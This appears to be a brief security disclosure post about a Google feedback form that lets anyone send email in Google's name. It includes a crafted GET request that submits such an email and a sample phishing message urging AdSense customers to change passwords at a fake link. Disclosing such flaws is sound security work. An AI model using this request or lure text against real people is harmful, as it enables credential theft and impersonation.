I really feel Google should know better than this. Check out this form residing on the Google domain[1]. It allows phishers to utilize the Google e-mail interface to phish Google customers in a very simple way. Let's say we set up a Google pages account or some other domain were we create a page that looks like the Adsense interface where customers can change there login credentials. We then use the Google e-mail interface to send an e-mail in Google's name and phish people into visiting this website and collect the submitted credentials.
While this can be nasty, it doesn't stop there. I wonder what happens when G Mail's spam filter kicks in when one starts spamming through this e-mail interface, and the filter starts blocking Google's own e-mail addresses because of the large volume of e-mail that is coming from their own domain? It's probably also possible to get someone's e-mail address blacklisted this way.
Moreover the e-mail interface also accepts GET to submit the phishing e-mail:
http://services.google.com/feedback/adsensetour_email? validate_form=yes& FirstName=adsensecustomer& Email=foobar%40gmail.com& LastName=Sergey+Brin& Company=security%40google.com&q_Answer=MESSAGE_HERE& submit=Send+It
Message:
This is an important message to all our Adsense customers. Google needs to verify your Adsense account, every year we require you to change your password in order for your safety. You must change your password within 10 days or your account will be suspended. Follow this link to change your password: http://googlepages.com/chgpass/
[1] http://services.google.com/feedback/adsensetour_email?hl=
source: OWASP News